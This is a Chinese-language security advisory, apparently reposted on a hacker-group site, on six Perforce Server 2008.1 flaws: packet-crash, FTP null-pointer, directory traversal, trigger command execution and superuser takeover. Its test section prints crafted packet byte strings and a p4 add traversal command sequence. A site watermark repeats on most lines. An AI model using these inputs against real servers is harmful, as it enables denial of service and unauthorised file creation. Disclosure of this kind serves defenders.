Perforce Server多个远程安全漏洞
发表时间:2010-03-10 08:57:15 作者: 来源:红客联盟 收藏本页
发布日期:2009-09-03ReE中国红客联盟-全球最大的红客组织
更新日期:2010-03-10ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
受影响系统:
Perforce Software Perforce Server 2008.1/160022
描述:
BUGTRAQ  ID: 36261ReE中国红客联盟-全球最大的红客组织
CVE ID: CVE-2010-0929,CVE-2010-0930,CVE-2010-0931,CVE-2010-0932,CVE-2010-0933,CVE-2010-0934ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
Perforce软件配置管理系统是客户端/服务器架构的SCM工具,用户可通过Perforce客户端软件访问其服务端。ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
Perforce Server中的多个安全漏洞可能允许远程用户导致拒绝服务或绕过某些安全限制执行非授权操作。ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
1) 远程用户可以通过向监听在1666/TCP端口上的p4s.exe服务发送以0x4c、0xb3、0xff、0xff和0xff字节序列开始的特制报文导致拒绝服务。ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
2) 远程用户可以通过向监听在1666/TCP端口上的p4s.exe服务发送客户端版本号之前包含有0xdc、0xff、0xff和0xff字节序列的特制报文导致拒绝服务。ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
3) 远程用户可通过向Perforce Server中的FTP服务器组件提交特制MKD命令触发空指针引用,导致拒绝服务。ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
4) 通过认证的用户可通过提交包含有目录遍历序列的p4 add命令执行目录遍历攻击,在服务器上创建任意文件。ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
5) trigger功能允许拥有超级用户权限的已认证远程用户结合trigger脚本使用p4 client命令执行任意操作系统命令。ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
6) 当保护表为空时,Perforce Server允许通过认证的远程用户通过p4 protect命令获得超级用户权限。ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
<*来源:IntevydisReE中国红客联盟-全球最大的红客组织
  ReE中国红客联盟-全球最大的红客组织
  链接:http://secunia.com/advisories/38816/ReE中国红客联盟-全球最大的红客组织
        http://lists.immunitysec.com/pipermail/dailydave/2010-March/006063.htmlReE中国红客联盟-全球最大的红客组织
*>ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
测试方法:

警 告ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!ReE中国红客联盟-全球最大的红客组织

s="x4cxb3xffxffxffx63x6dx70x66x69x6cx65x00x00x00x00"ReE中国红客联盟-全球最大的红客组织
s+="x00x00x63x6cx69x65x6ex74x00x02x00x00x00x36x33x00"ReE中国红客联盟-全球最大的红客组织
s="x1bx1bx00x00x00x63x6dx70x66x69x6cx65x00x00x00x00"ReE中国红客联盟-全球最大的红客组织
s+="x00x00x63x6cx69x65x6ex74x00xdcxffxffxffx36x33x00"ReE中国红客联盟-全球最大的红客组织
s="x4cx4cx00x00x00x63x6dx70x66x69x6cx65x00x00x00x00"ReE中国红客联盟-全球最大的红客组织
s+="x00x00x63x6cx69x65x6ex74x00x02x00x00x00x36x33x00"ReE中国红客联盟-全球最大的红客组织
s+="x61x70x69x00x0cxffxffxffx39x39x39x39x39x00x73x6e"ReE中国红客联盟-全球最大的红客组织
s+="x64x62x75x66x00x05x00x00x00x36x35x35x33x36x00x66"ReE中国红客联盟-全球最大的红客组织
s+="x75x6ex63x00x08x00x00x00x70x72x6fx74x6fx63x6fx6c"ReE中国红客联盟-全球最大的红客组织
s+="x00"ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
$ echo TESTTEST > "..............test.txt"ReE中国红客联盟-全球最大的红客组织
$ p4 add "..............test.txt"ReE中国红客联盟-全球最大的红客组织
//depot/..............test.txt#1 - opened for addReE中国红客联盟-全球最大的红客组织
$ p4 submitReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
建议:
厂商补丁:ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
Perforce SoftwareReE中国红客联盟-全球最大的红客组织
-----------------ReE中国红客联盟-全球最大的红客组织
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:ReE中国红客联盟-全球最大的红客组织
ReE中国红客联盟-全球最大的红客组织
http://www.perforce.com/ReE中国红客联盟-全球最大的红客组织
豫ICP备09015648号版权所有© 2001-2009中国红客联盟 All Rights Reserved.